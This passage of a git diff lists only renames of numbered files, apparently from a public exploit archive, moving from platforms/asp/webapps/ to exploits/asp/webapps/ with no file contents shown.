100% rename from platforms/asp/webapps/10777.txt rename to exploits/asp/webapps/10777.txt diff --git a/platforms/asp/webapps/10778.txt b/exploits/asp/webapps/10778.txt similarity index 100% rename from platforms/asp/webapps/10778.txt rename to exploits/asp/webapps/10778.txt diff --git a/platforms/asp/webapps/10780.txt b/exploits/asp/webapps/10780.txt similarity index 100% rename from platforms/asp/webapps/10780.txt rename to exploits/asp/webapps/10780.txt diff --git a/platforms/asp/webapps/10794.txt b/exploits/asp/webapps/10794.txt similarity index 100% rename from platforms/asp/webapps/10794.txt rename to exploits/asp/webapps/10794.txt diff --git a/platforms/asp/webapps/10795.txt b/exploits/asp/webapps/10795.txt similarity index 100% rename from platforms/asp/webapps/10795.txt rename to exploits/asp/webapps/10795.txt diff --git a/platforms/asp/webapps/10796.txt b/exploits/asp/webapps/10796.txt similarity index 100% rename from platforms/asp/webapps/10796.txt rename to exploits/asp/webapps/10796.txt diff --git a/platforms/asp/webapps/10819.txt b/exploits/asp/webapps/10819.txt similarity index 100% rename from platforms/asp/webapps/10819.txt rename to exploits/asp/webapps/10819.txt diff --git a/platforms/asp/webapps/10823.txt b/exploits/asp/webapps/10823.txt similarity index 100% rename from platforms/asp/webapps/10823.txt rename to exploits/asp/webapps/10823.txt diff --git a/platforms/asp/webapps/10883.txt b/exploits/asp/webapps/10883.txt similarity index 100% rename from platforms/asp/webapps/10883.txt rename to exploits/asp/webapps/10883.txt diff --git a/platforms/asp/webapps/10884.txt b/exploits/asp/webapps/10884.txt similarity index 100% rename from platforms/asp/webapps/10884.txt rename to exploits/asp/webapps/10884.txt diff --git a/platforms/asp/webapps/10903.txt b/exploits/asp/webapps/10903.txt similarity index 100% rename from platforms/asp/webapps/10903.txt rename to exploits/asp/webapps/10903.txt diff --git a/platforms/asp/webapps/10940.txt b/exploits/asp/webapps/10940.txt similarity index 100% rename from platforms/asp/webapps/10940.txt rename to exploits/asp/webapps/10940.txt diff --git a/platforms/asp/webapps/10955.txt b/exploits/asp/webapps/10955.txt similarity index 100% rename from platforms/asp/webapps/10955.txt rename to exploits/asp/webapps/10955.txt diff --git a/platforms/asp/webapps/10972.txt b/exploits/asp/webapps/10972.txt similarity index 100% rename from platforms/asp/webapps/10972.txt rename to exploits/asp/webapps/10972.txt diff --git a/platforms/asp/webapps/11005.txt b/exploits/asp/webapps/11005.txt similarity index 100% rename from platforms/asp/webapps/11005.txt rename to exploits/asp/webapps/11005.txt diff --git a/platforms/asp/webapps/11008.txt b/exploits/asp/webapps/11008.txt similarity index 100% rename from platforms/asp/webapps/11008.txt rename to exploits/asp/webapps/11008.txt diff --git a/platforms/asp/webapps/11015.txt b/exploits/asp/webapps/11015.txt similarity index 100% rename from platforms/asp/webapps/11015.txt rename to exploits/asp/webapps/11015.txt diff --git a/platforms/asp/webapps/11016.txt b/exploits/asp/webapps/11016.txt similarity index 100% rename from platforms/asp/webapps/11016.txt rename to exploits/asp/webapps/11016.txt diff --git a/platforms/asp/webapps/11018.txt b/exploits/asp/webapps/11018.txt similarity index 100% rename from platforms/asp/webapps/11018.txt rename to exploits/asp/webapps/11018.txt diff --git a/platforms/asp/webapps/11023.txt b/exploits/asp/webapps/11023.txt similarity index 100% rename from platforms/asp/webapps/11023.txt rename to exploits/asp/webapps/11023.txt diff --git a/platforms/asp/webapps/11096.txt b/exploits/asp/webapps/11096.txt similarity index 100% rename from platforms/asp/webapps/11096.txt rename to exploits/asp/webapps/11096.txt diff --git a/platforms/asp/webapps/11097.txt b/exploits/asp/webapps/11097.txt similarity index 100% rename from platforms/asp/webapps/11097.txt rename to exploits/asp/webapps/11097.txt diff --git a/platforms/asp/webapps/11098.txt b/exploits/asp/webapps/11098.txt similarity index 100% rename from platforms/asp/webapps/11098.txt rename to exploits/asp/webapps/11098.txt diff --git a/platforms/asp/webapps/1112.txt b/exploits/asp/webapps/1112.txt similarity index 100% rename from platforms/asp/webapps/1112.txt rename to exploits/asp/webapps/1112.txt diff --git a/platforms/asp/webapps/11134.txt b/exploits/asp/webapps/11134.txt similarity index 100% rename from platforms/asp/webapps/11134.txt rename to exploits/asp/webapps/11134.txt diff --git a/platforms/asp/webapps/11212.txt b/exploits/asp/webapps/11212.txt similarity index 100% rename from platforms/asp/webapps/11212.txt rename to exploits/asp/webapps/11212.txt diff --git a/platforms/asp/webapps/11295.txt b/exploits/asp/webapps/11295.txt similarity index 100% rename from platforms/asp/webapps/11295.txt rename to exploits/asp/webapps/11295.txt diff --git a/platforms/asp/webapps/11310.txt b/exploits/asp/webapps/11310.txt similarity index 100% rename from platforms/asp/webapps/11310.txt rename to exploits/asp/webapps/11310.txt diff --git a/platforms/asp/webapps/11348.txt b/exploits/asp/webapps/11348.txt similarity index 100% rename from platforms/asp/webapps/11348.txt rename to exploits/asp/webapps/11348.txt diff --git a/platforms/asp/webapps/11361.txt b/exploits/asp/webapps/11361.txt similarity index 100% rename from platforms/asp/webapps/11361.txt rename to exploits/asp/webapps/11361.txt diff --git a/platforms/asp/webapps/11369.txt b/exploits/asp/webapps/11369.txt similarity index 100% rename from platforms/asp/webapps/11369.txt rename to exploits/asp/webapps/11369.txt diff --git a/platforms/asp/webapps/11414.txt b/exploits/asp/webapps/11414.txt similarity index 100% rename from platforms/asp/webapps/11414.txt rename to exploits/asp/webapps/11414.txt diff --git a/platforms/asp/webapps/11555.txt b/exploits/asp/webapps/11555.txt similarity index 100% rename from platforms/asp/webapps/11555.txt rename to exploits/asp/webapps/11555.txt diff --git a/platforms/asp/webapps/11589.txt b/exploits/asp/webapps/11589.txt similarity index 100% rename from platforms/asp/webapps/11589.txt rename to exploits/asp/webapps/11589.txt diff --git a/platforms/asp/webapps/11606.txt b/exploits/asp/webapps/11606.txt similarity index 100% rename from platforms/asp/webapps/11606.txt rename to exploits/asp/webapps/11606.txt diff --git a/platforms/asp/webapps/11611.txt b/exploits/asp/webapps/11611.txt similarity index 100% rename from platforms/asp/webapps/11611.txt rename to exploits/asp/webapps/11611.txt diff --git a/platforms/asp/webapps/11931.txt b/exploits/asp/webapps/11931.txt similarity index 100% rename from platforms/asp/webapps/11931.txt rename to exploits/asp/webapps/11931.txt diff --git a/platforms/asp/webapps/12029.txt b/exploits/asp/webapps/12029.txt similarity index 100% rename from platforms/asp/webapps/12029.txt rename to exploits/asp/webapps/12029.txt diff --git a/platforms/asp/webapps/12100.txt b/exploits/asp/webapps/12100.txt similarity index 100% rename from platforms/asp/webapps/12100.txt rename to exploits/asp/webapps/12100.txt diff --git a/platforms/asp/webapps/12197.txt b/exploits/asp/webapps/12197.txt similarity index 100% rename from platforms/asp/webapps/12197.txt rename to exploits/asp/webapps/12197.txt diff --git a/platforms/asp/webapps/12199.txt b/exploits/asp/webapps/12199.txt similarity index 100% rename from platforms/asp/webapps/12199.txt rename to exploits/asp/webapps/12199.txt diff --git a/platforms/asp/webapps/12218.txt b/exploits/asp/webapps/12218.txt similarity index 100% rename from platforms/asp/webapps/12218.txt rename to exploits/asp/webapps/12218.txt diff --git a/platforms/asp/webapps/12329.txt b/exploits/asp/webapps/12329.txt similarity index 100% rename from platforms/asp/webapps/12329.txt rename to exploits/asp/webapps/12329.txt diff --git a/platforms/asp/webapps/12424.txt b/exploits/asp/webapps/12424.txt similarity index 100% rename from platforms/asp/webapps/12424.txt rename to exploits/asp/webapps/12424.txt diff --git a/platforms/asp/webapps/12464.txt b/exploits/asp/webapps/12464.txt similarity index 100% rename from platforms/asp/webapps/12464.txt rename to exploits/asp/webapps/12464.txt diff --git a/platforms/asp/webapps/12471.txt b/exploits/asp/webapps/12471.txt similarity index 100% rename from platforms/asp/webapps/12471.txt rename to exploits/asp/webapps/12471.txt diff --git a/platforms/asp/webapps/12478.txt b/exploits/asp/webapps/12478.txt similarity index 100% rename from platforms/asp/webapps/12478.txt rename to exploits/asp/webapps/12478.txt diff --git a/platforms/asp/webapps/1252.html b/exploits/asp/webapps/1252.html similarity index 100% rename from platforms/asp/webapps/1252.html rename to exploits/asp/webapps/1252.html diff --git a/platforms/asp/webapps/12526.txt b/exploits/asp/webapps/12526.txt similarity index 100% rename from platforms/asp/webapps/12526.txt rename to exploits/asp/webapps/12526.txt diff --git a/platforms/asp/webapps/12571.txt b/exploits/asp/webapps/12571.txt similarity index 100% rename from platforms/asp/webapps/12571.txt rename to exploits/asp/webapps/12571.txt diff --git a/platforms/asp/webapps/12606.txt b/exploits/asp/webapps/12606.txt similarity index 100% rename from platforms/asp/webapps/12606.txt rename to exploits/asp/webapps/12606.txt diff --git a/platforms/asp/webapps/12664.txt b/exploits/asp/webapps/12664.txt similarity index 100% rename from platforms/asp/webapps/12664.txt rename to exploits/asp/webapps/12664.txt diff --git a/platforms/asp/webapps/12672.txt b/exploits/asp/webapps/12672.txt similarity index 100% rename from platforms/asp/webapps/12672.txt rename to exploits/asp/webapps/12672.txt diff --git a/platforms/asp/webapps/12693.txt b/exploits/asp/webapps/12693.txt similarity index 100% rename from platforms/asp/webapps/12693.txt rename to exploits/asp/webapps/12693.txt diff --git a/platforms/asp/webapps/12700.txt b/exploits/asp/webapps/12700.txt similarity index 100% rename from platforms/asp/webapps/12700.txt rename to exploits/asp/webapps/12700.txt diff --git a/platforms/asp/webapps/12701.txt b/exploits/asp/webapps/12701.txt similarity index 100% rename from platforms/asp/webapps/12701.txt rename to exploits/asp/webapps/12701.txt diff --git a/platforms/asp/webapps/12734.txt b/exploits/asp/webapps/12734.txt similarity index 100% rename from platforms/asp/webapps/12734.txt rename to exploits/asp/webapps/12734.txt diff --git a/platforms/asp/webapps/12833.txt b/exploits/asp/webapps/12833.txt similarity index 100% rename from platforms/asp/webapps/12833.txt rename to exploits/asp/webapps/12833.txt diff --git a/platforms/asp/webapps/12841.txt b/exploits/asp/webapps/12841.txt similarity index 100% rename from platforms/asp/webapps/12841.txt rename to exploits/asp/webapps/12841.txt diff --git a/platforms/asp/webapps/13788.txt b/exploits/asp/webapps/13788.txt similarity index 100% rename from platforms/asp/webapps/13788.txt rename to exploits/asp/webapps/13788.txt diff --git a/platforms/asp/webapps/13789.txt b/exploits/asp/webapps/13789.txt similarity index 100% rename from platforms/asp/webapps/13789.txt rename to exploits/asp/webapps/13789.txt diff --git a/platforms/asp/webapps/13790.txt b/exploits/asp/webapps/13790.txt similarity index 100% rename from platforms/asp/webapps/13790.txt rename to exploits/asp/webapps/13790.txt diff --git a/platforms/asp/webapps/13793.txt b/exploits/asp/webapps/13793.txt similarity index 100% rename from platforms/asp/webapps/13793.txt rename to exploits/asp/webapps/13793.txt diff --git a/platforms/asp/webapps/13814.txt b/exploits/asp/webapps/13814.txt similarity index 100% rename from platforms/asp/webapps/13814.txt rename to exploits/asp/webapps/13814.txt diff --git a/platforms/asp/webapps/13815.pl b/exploits/asp/webapps/13815.pl similarity index 100% rename from platforms/asp/webapps/13815.pl rename to exploits/asp/webapps/13815.pl diff --git a/platforms/asp/webapps/13840.txt b/exploits/asp/webapps/13840.txt similarity index 100% rename from platforms/asp/webapps/13840.txt rename to exploits/asp/webapps/13840.txt diff --git a/platforms/asp/webapps/13841.txt b/exploits/asp/webapps/13841.txt similarity index 100% rename from platforms/asp/webapps/13841.txt rename to exploits/asp/webapps/13841.txt diff --git a/platforms/asp/webapps/13842.txt b/exploits/asp/webapps/13842.txt similarity index 100% rename from platforms/asp/webapps/13842.txt rename to exploits/asp/webapps/13842.txt diff --git a/platforms/asp/webapps/13843.txt b/exploits/asp/webapps/13843.txt similarity index 100% rename from platforms/asp/webapps/13843.txt rename to exploits/asp/webapps/13843.txt diff --git a/platforms/asp/webapps/13846.txt b/exploits/asp/webapps/13846.txt similarity index 100% rename from platforms/asp/webapps/13846.txt rename to exploits/asp/webapps/13846.txt diff --git a/platforms/asp/webapps/13859.txt b/exploits/asp/webapps/13859.txt similarity index 100% rename from platforms/asp/webapps/13859.txt rename to exploits/asp/webapps/13859.txt diff --git a/platforms/asp/webapps/13860.txt b/exploits/asp/webapps/13860.txt similarity index 100% rename from platforms/asp/webapps/13860.txt rename to exploits/asp/webapps/13860.txt diff --git a/platforms/asp/webapps/13861.txt b/exploits/asp/webapps/13861.txt similarity index 100% rename from platforms/asp/webapps/13861.txt rename to exploits/asp/webapps/13861.txt diff --git a/platforms/asp/webapps/13880.txt b/exploits/asp/webapps/13880.txt similarity index 100% rename from platforms/asp/webapps/13880.txt rename to exploits/asp/webapps/13880.txt diff --git a/platforms/asp/webapps/13882.txt b/exploits/asp/webapps/13882.txt similarity index 100% rename from platforms/asp/webapps/13882.txt rename to exploits/asp/webapps/13882.txt diff --git a/platforms/asp/webapps/13883.txt b/exploits/asp/webapps/13883.txt similarity index 100% rename from platforms/asp/webapps/13883.txt rename to exploits/asp/webapps/13883.txt diff --git a/platforms/asp/webapps/13884.txt b/exploits/asp/webapps/13884.txt similarity index 100% rename from platforms/asp/webapps/13884.txt rename to exploits/asp/webapps/13884.txt diff --git a/platforms/asp/webapps/13885.txt b/exploits/asp/webapps/13885.txt similarity index 100% rename from platforms/asp/webapps/13885.txt rename to exploits/asp/webapps/13885.txt diff --git a/platforms/asp/webapps/13886.txt b/exploits/asp/webapps/13886.txt similarity index 100% rename from platforms/asp/webapps/13886.txt rename to exploits/asp/webapps/13886.txt diff --git a/platforms/asp/webapps/13891.html b/exploits/asp/webapps/13891.html similarity index 100% rename from platforms/asp/webapps/13891.html rename to exploits/asp/webapps/13891.html diff --git a/platforms/asp/webapps/13902.txt b/exploits/asp/webapps/13902.txt similarity index 100% rename from platforms/asp/webapps/13902.txt rename to exploits/asp/webapps/13902.txt diff --git a/platforms/asp/webapps/1399.txt b/exploits/asp/webapps/1399.txt similarity index 100% rename from platforms/asp/webapps/1399.txt rename to exploits/asp/webapps/1399.txt diff --git a/platforms/asp/webapps/13990.txt b/exploits/asp/webapps/13990.txt similarity index 100% rename from platforms/asp/webapps/13990.txt rename to exploits/asp/webapps/13990.txt diff --git a/platforms/asp/webapps/13995.txt b/exploits/asp/webapps/13995.txt similarity index 100% rename from platforms/asp/webapps/13995.txt rename to exploits/asp/webapps/13995.txt diff --git a/platforms/asp/webapps/14030.pl b/exploits/asp/webapps/14030.pl similarity index 100% rename from platforms/asp/webapps/14030.pl rename to exploits/asp/webapps/14030.pl diff --git a/platforms/asp/webapps/14149.txt b/exploits/asp/webapps/14149.txt similarity index 100% rename from platforms/asp/webapps/14149.txt rename to exploits/asp/webapps/14149.txt diff --git a/platforms/asp/webapps/14155.txt b/exploits/asp/webapps/14155.txt similarity index 100% rename from platforms/asp/webapps/14155.txt rename to exploits/asp/webapps/14155.txt diff --git a/platforms/asp/webapps/14168.txt b/exploits/asp/webapps/14168.txt similarity index 100% rename from platforms/asp/webapps/14168.txt rename to exploits/asp/webapps/14168.txt diff --git a/platforms/asp/webapps/14169.txt b/exploits/asp/webapps/14169.txt similarity index 100% rename from platforms/asp/webapps/14169.txt rename to exploits/asp/webapps/14169.txt diff --git a/platforms/asp/webapps/1418.txt b/exploits/asp/webapps/1418.txt similarity index 100% rename from platforms/asp/webapps/1418.txt rename to exploits/asp/webapps/1418.txt diff --git a/platforms/asp/webapps/1419.pl b/exploits/asp/webapps/1419.pl similarity index 100% rename from platforms/asp/webapps/1419.pl rename to exploits/asp/webapps/1419.pl diff --git a/platforms/asp/webapps/14192.txt b/exploits/asp/webapps/14192.txt similarity index 100% rename from platforms/asp/webapps/14192.txt rename to exploits/asp/webapps/14192.txt diff --git a/platforms/asp/webapps/14281.txt b/exploits/asp/webapps/14281.txt similarity index 100% rename from platforms/asp/webapps/14281.txt rename to exploits/asp/webapps/14281.txt diff --git a/platforms/asp/webapps/14283.txt b/exploits/asp/webapps/14283.txt similarity index 100% rename from platforms/asp/webapps/14283.txt rename to exploits/asp/webapps/14283.txt diff --git a/platforms/asp/webapps/14284.txt b/exploits/asp/webapps/14284.txt similarity index 100% rename from platforms/asp/webapps/14284.txt rename to exploits/asp/webapps/14284.txt diff --git a/platforms/asp/webapps/14401.txt b/exploits/asp/webapps/14401.txt similarity index 100% rename from platforms/asp/webapps/14401.txt rename to exploits/asp/webapps/14401.txt diff --git a/platforms/asp/webapps/14419.txt b/exploits/asp/webapps/14419.txt similarity index 100% rename from platforms/asp/webapps/14419.txt rename to exploits/asp/webapps/14419.txt diff --git a/platforms/asp/webapps/14420.txt b/exploits/asp/webapps/14420.txt similarity index 100% rename from platforms/asp/webapps/14420.txt rename to exploits/asp/webapps/14420.txt diff --git a/platforms/asp/webapps/14421.txt b/exploits/asp/webapps/14421.txt similarity index 100% rename from platforms/asp/webapps/14421.txt rename to exploits/asp/webapps/14421.txt diff --git a/platforms/asp/webapps/14461.txt b/exploits/asp/webapps/14461.txt similarity index 100% rename from platforms/asp/webapps/14461.txt rename to exploits/asp/webapps/14461.txt diff --git a/platforms/asp/webapps/14704.txt b/exploits/asp/webapps/14704.txt similarity index 100% rename from platforms/asp/webapps/14704.txt rename to exploits/asp/webapps/14704.txt diff --git a/platforms/asp/webapps/14709.txt b/exploits/asp/webapps/14709.txt similarity index 100% rename from platforms/asp/webapps/14709.txt rename to exploits/asp/webapps/14709.txt diff --git a/platforms/asp/webapps/1472.pl b/exploits/asp/webapps/1472.pl similarity index 100% rename from platforms/asp/webapps/1472.pl rename to exploits/asp/webapps/1472.pl diff --git a/platforms/asp/webapps/14821.txt b/exploits/asp/webapps/14821.txt similarity index 100% rename from platforms/asp/webapps/14821.txt rename to exploits/asp/webapps/14821.txt diff --git a/platforms/asp/webapps/14870.txt b/exploits/asp/webapps/14870.txt similarity index 100% rename from platforms/asp/webapps/14870.txt rename to exploits/asp/webapps/14870.txt diff --git a/platforms/asp/webapps/14879.txt b/exploits/asp/webapps/14879.txt similarity index 100% rename from platforms/asp/webapps/14879.txt rename to exploits/asp/webapps/14879.txt diff --git a/platforms/asp/webapps/14898.txt b/exploits/asp/webapps/14898.txt similarity index 100% rename from platforms/asp/webapps/14898.txt rename to exploits/asp/webapps/14898.txt diff --git a/platforms/asp/webapps/14908.txt b/exploits/asp/webapps/14908.txt similarity index 100% rename from platforms/asp/webapps/14908.txt rename to exploits/asp/webapps/14908.txt diff --git a/platforms/asp/webapps/14913.txt b/exploits/asp/webapps/14913.txt similarity index 100% rename from platforms/asp/webapps/14913.txt rename to exploits/asp/webapps/14913.txt diff --git a/platforms/asp/webapps/14914.txt b/exploits/asp/webapps/14914.txt similarity index 100% rename from platforms/asp/webapps/14914.txt rename to exploits/asp/webapps/14914.txt diff --git a/platforms/asp/webapps/14919.txt b/exploits/asp/webapps/14919.txt similarity index 100% rename from platforms/asp/webapps/14919.txt rename to exploits/asp/webapps/14919.txt diff --git a/platforms/asp/webapps/14943.txt b/exploits/asp/webapps/14943.txt similarity index 100% rename from platforms/asp/webapps/14943.txt rename to exploits/asp/webapps/14943.txt diff --git a/platforms/asp/webapps/14954.txt b/exploits/asp/webapps/14954.txt similarity index 100% rename from platforms/asp/webapps/14954.txt rename to exploits/asp/webapps/14954.txt diff --git a/platforms/asp/webapps/14969.txt b/exploits/asp/webapps/14969.txt similarity index 100% rename from platforms/asp/webapps/14969.txt rename to exploits/asp/webapps/14969.txt diff --git a/platforms/asp/webapps/14980.txt b/exploits/asp/webapps/14980.txt similarity index 100% rename from platforms/asp/webapps/14980.txt rename to exploits/asp/webapps/14980.txt diff --git a/platforms/asp/webapps/14991.txt b/exploits/asp/webapps/14991.txt similarity index 100% rename from platforms/asp/webapps/14991.txt rename to exploits/asp/webapps/14991.txt diff --git a/platforms/asp/webapps/14999.txt b/exploits/asp/webapps/14999.txt similarity index 100% rename from platforms/asp/webapps/14999.txt rename to exploits/asp/webapps/14999.txt diff --git a/platforms/asp/webapps/15018.txt b/exploits/asp/webapps/15018.txt similarity index 100% rename from platforms/asp/webapps/15018.txt rename to exploits/asp/webapps/15018.txt diff --git a/platforms/asp/webapps/15044.txt b/exploits/asp/webapps/15044.txt similarity index 100% rename from platforms/asp/webapps/15044.txt rename to exploits/asp/webapps/15044.txt diff --git a/platforms/asp/webapps/15058.html b/exploits/asp/webapps/15058.html similarity index 100% rename from platforms/asp/webapps/15058.html rename to exploits/asp/webapps/15058.html diff --git a/platforms/asp/webapps/15067.txt b/exploits/asp/webapps/15067.txt similarity index 100% rename from platforms/asp/webapps/15067.txt rename to exploits/asp/webapps/15067.txt diff --git a/platforms/asp/webapps/15078.txt b/exploits/asp/webapps/15078.txt similarity index 100% rename from platforms/asp/webapps/15078.txt rename to exploits/asp/webapps/15078.txt diff --git a/platforms/asp/webapps/15106.txt b/exploits/asp/webapps/15106.txt similarity index 100% rename from platforms/asp/webapps/15106.txt rename to exploits/asp/webapps/15106.txt diff --git a/platforms/asp/webapps/15118.txt b/exploits/asp/webapps/15118.txt similarity index 100% rename from platforms/asp/webapps/15118.txt rename to exploits/asp/webapps/15118.txt diff --git a/platforms/asp/webapps/15124.txt b/exploits/asp/webapps/15124.txt similarity index 100% rename from platforms/asp/webapps/15124.txt rename to exploits/asp/webapps/15124.txt diff --git a/platforms/asp/webapps/15139.txt b/exploits/asp/webapps/15139.txt similarity index 100% rename from platforms/asp/webapps/15139.txt rename to exploits/asp/webapps/15139.txt diff --git a/platforms/asp/webapps/1514.pl b/exploits/asp/webapps/1514.pl similarity index 100% rename from platforms/asp/webapps/1514.pl rename to exploits/asp/webapps/1514.pl diff --git a/platforms/asp/webapps/15160.txt b/exploits/asp/webapps/15160.txt similarity index 100% rename from platforms/asp/webapps/15160.txt rename to exploits/asp/webapps/15160.txt diff --git a/platforms/asp/webapps/15183.py b/exploits/asp/webapps/15183.py similarity index 100% rename from platforms/asp/webapps/15183.py rename to exploits/asp/webapps/15183.py diff --git a/platforms/asp/webapps/15185.txt b/exploits/asp/webapps/15185.txt similarity index 100% rename from platforms/asp/webapps/15185.txt rename to exploits/asp/webapps/15185.txt diff --git a/platforms/asp/webapps/15189.txt b/exploits/asp/webapps/15189.txt similarity index 100% rename from platforms/asp/webapps/15189.txt rename to exploits/asp/webapps/15189.txt diff --git a/platforms/asp/webapps/15191.txt b/exploits/asp/webapps/15191.txt similarity index 100% rename from platforms/asp/webapps/15191.txt rename to exploits/asp/webapps/15191.txt diff --git a/platforms/asp/webapps/15199.py b/exploits/asp/webapps/15199.py similarity index 100% rename from platforms/asp/webapps/15199.py rename to exploits/asp/webapps/15199.py diff --git a/platforms/asp/webapps/15218.txt b/exploits/asp/webapps/15218.txt similarity index 100% rename from platforms/asp/webapps/15218.txt rename to exploits/asp/webapps/15218.txt diff --git a/platforms/asp/webapps/15219.py b/exploits/asp/webapps/15219.py similarity index 100% rename from platforms/asp/webapps/15219.py rename to exploits/asp/webapps/15219.py diff --git a/platforms/asp/webapps/15230.txt b/exploits/asp/webapps/15230.txt similarity index 100% rename from platforms/asp/webapps/15230.txt rename to exploits/asp/webapps/15230.txt diff --git a/platforms/asp/webapps/15270.txt b/exploits/asp/webapps/15270.txt similarity index 100% rename from platforms/asp/webapps/15270.txt rename to exploits/asp/webapps/15270.txt diff --git a/platforms/asp/webapps/1528.pl b/exploits/asp/webapps/1528.pl similarity index 100% rename from platforms/asp/webapps/1528.pl rename to exploits/asp/webapps/1528.pl diff --git a/platforms/asp/webapps/1529.html b/exploits/asp/webapps/1529.html similarity index 100% rename from platforms/asp/webapps/1529.html rename to exploits/asp/webapps/1529.html diff --git a/platforms/asp/webapps/15382.txt b/exploits/asp/webapps/15382.txt similarity index 100% rename from platforms/asp/webapps/15382.txt rename to exploits/asp/webapps/15382.txt diff --git a/platforms/asp/webapps/15395.txt b/exploits/asp/webapps/15395.txt similarity index 100% rename from platforms/asp/webapps/15395.txt rename to exploits/asp/webapps/15395.txt diff --git a/platforms/asp/webapps/15396.txt b/exploits/asp/webapps/15396.txt similarity index 100% rename from platforms/asp/webapps/15396.txt rename to exploits/asp/webapps/15396.txt diff --git a/platforms/asp/webapps/15397.txt b/exploits/asp/webapps/15397.txt similarity index 100% rename from platforms/asp/webapps/15397.txt rename to exploits/asp/webapps/15397.txt diff --git a/platforms/asp/webapps/15398.txt b/exploits/asp/webapps/15398.txt similarity index 100% rename from platforms/asp/webapps/15398.txt rename to exploits/asp/webapps/15398.txt diff --git a/platforms/asp/webapps/15399.txt b/exploits/asp/webapps/15399.txt similarity index 100% rename from platforms/asp/webapps/15399.txt rename to exploits/asp/webapps/15399.txt diff --git a/platforms/asp/webapps/15448.txt b/exploits/asp/webapps/15448.txt similarity index 100% rename from platforms/asp/webapps/15448.txt rename to exploits/asp/webapps/15448.txt diff --git a/platforms/asp/webapps/15497.txt b/exploits/asp/webapps/15497.txt similarity index 100% rename from platforms/asp/webapps/15497.txt rename to exploits/asp/webapps/15497.txt diff --git a/platforms/asp/webapps/1550.txt b/exploits/asp/webapps/1550.txt similarity index 100% rename from platforms/asp/webapps/1550.txt rename to exploits/asp/webapps/1550.txt diff --git a/platforms/asp/webapps/15544.txt b/exploits/asp/webapps/15544.txt similarity index 100% rename from platforms/asp/webapps/15544.txt rename to exploits/asp/webapps/15544.txt diff --git a/platforms/asp/webapps/15551.txt b/exploits/asp/webapps/15551.txt similarity index 100% rename from platforms/asp/webapps/15551.txt rename to exploits/asp/webapps/15551.txt diff --git a/platforms/asp/webapps/15552.txt b/exploits/asp/webapps/15552.txt similarity index 100% rename from platforms/asp/webapps/15552.txt rename to exploits/asp/webapps/15552.txt diff --git a/platforms/asp/webapps/15553.txt b/exploits/asp/webapps/15553.txt similarity index 100% rename from platforms/asp/webapps/15553.txt rename to exploits/asp/webapps/15553.txt diff --git a/platforms/asp/webapps/15554.txt b/exploits/asp/webapps/15554.txt similarity index 100% rename from platforms/asp/webapps/15554.txt rename to exploits/asp/webapps/15554.txt diff --git a/platforms/asp/webapps/15563.txt b/exploits/asp/webapps/15563.txt similarity index 100% rename from platforms/asp/webapps/15563.txt rename to exploits/asp/webapps/15563.txt diff --git a/platforms/asp/webapps/15597.txt b/exploits/asp/webapps/15597.txt similarity index 100% rename from platforms/asp/webapps/15597.txt rename to exploits/asp/webapps/15597.txt diff --git a/platforms/asp/webapps/1562.pl b/exploits/asp/webapps/1562.pl similarity index 100% rename from platforms/asp/webapps/1562.pl rename to exploits/asp/webapps/1562.pl diff --git a/platforms/asp/webapps/15627.html b/exploits/asp/webapps/15627.html similarity index 100% rename from platforms/asp/webapps/15627.html rename to exploits/asp/webapps/15627.html diff --git a/platforms/asp/webapps/15629.txt b/exploits/asp/webapps/15629.txt similarity index 100% rename from platforms/asp/webapps/15629.txt rename to exploits/asp/webapps/15629.txt diff --git a/platforms/asp/webapps/15653.txt b/exploits/asp/webapps/15653.txt similarity index 100% rename from platforms/asp/webapps/15653.txt rename to exploits/asp/webapps/15653.txt diff --git a/platforms/asp/webapps/15661.txt b/exploits/asp/webapps/15661.txt similarity index 100% rename from platforms/asp/webapps/15661.txt rename to exploits/asp/webapps/15661.txt diff --git a/platforms/asp/webapps/15665.txt b/exploits/asp/webapps/15665.txt similarity index 100% rename from platforms/asp/webapps/15665.txt rename to exploits/asp/webapps/15665.txt diff --git a/platforms/asp/webapps/15673.txt b/exploits/asp/webapps/15673.txt similarity index 100% rename from platforms/asp/webapps/15673.txt rename to exploits/asp/webapps/15673.txt diff --git a/platforms/asp/webapps/15677.txt b/exploits/asp/webapps/15677.txt similarity index 100% rename from platforms/asp/webapps/15677.txt rename to exploits/asp/webapps/15677.txt diff --git a/platforms/asp/webapps/15678.txt b/exploits/asp/webapps/15678.txt similarity index 100% rename from platforms/asp/webapps/15678.txt rename to exploits/asp/webapps/15678.txt diff --git a/platforms/asp/webapps/15679.txt b/exploits/asp/webapps/15679.txt similarity index 100% rename from platforms/asp/webapps/15679.txt rename to exploits/asp/webapps/15679.txt diff --git a/platforms/asp/webapps/15680.txt b/exploits/asp/webapps/15680.txt similarity index 100% rename from platforms/asp/webapps/15680.txt rename to exploits/asp/webapps/15680.txt diff --git a/platforms/asp/webapps/15681.txt b/exploits/asp/webapps/15681.txt similarity index 100% rename from platforms/asp/webapps/15681.txt rename to exploits/asp/webapps/15681.txt diff --git a/platforms/asp/webapps/15682.txt b/exploits/asp/webapps/15682.txt similarity index 100% rename from platforms/asp/webapps/15682.txt rename to exploits/asp/webapps/15682.txt diff --git a/platforms/asp/webapps/15683.txt b/exploits/asp/webapps/15683.txt similarity index 100% rename from platforms/asp/webapps/15683.txt rename to exploits/asp/webapps/15683.txt diff --git a/platforms/asp/webapps/15686.txt b/exploits/asp/webapps/15686.txt similarity index 100% rename from platforms/asp/webapps/15686.txt rename to exploits/asp/webapps/15686.txt diff --git a/platforms/asp/webapps/15687.txt b/exploits/asp/webapps/15687.txt similarity index 100% rename from platforms/asp/webapps/15687.txt rename to exploits/asp/webapps/15687.txt diff --git a/platforms/asp/webapps/15688.txt b/exploits/asp/webapps/15688.txt similarity index 100% rename from platforms/asp/webapps/15688.txt rename to exploits/asp/webapps/15688.txt diff --git a/platforms/asp/webapps/1569.pl b/exploits/asp/webapps/1569.pl similarity index 100% rename from platforms/asp/webapps/1569.pl rename to exploits/asp/webapps/1569.pl diff --git a/platforms/asp/webapps/15690.txt b/exploits/asp/webapps/15690.txt similarity index 100% rename from platforms/asp/webapps/15690.txt rename to exploits/asp/webapps/15690.txt diff --git a/platforms/asp/webapps/15703.txt b/exploits/asp/webapps/15703.txt similarity index 100% rename from platforms/asp/webapps/15703.txt rename to exploits/asp/webapps/15703.txt diff --git a/platforms/asp/webapps/1571.html b/exploits/asp/webapps/1571.html similarity index 100% rename from platforms/asp/webapps/1571.html rename to exploits/asp/webapps/1571.html diff --git a/platforms/asp/webapps/15776.pl b/exploits/asp/webapps/15776.pl similarity index 100% rename from platforms/asp/webapps/15776.pl rename to exploits/asp/webapps/15776.pl diff --git a/platforms/asp/webapps/15777.txt 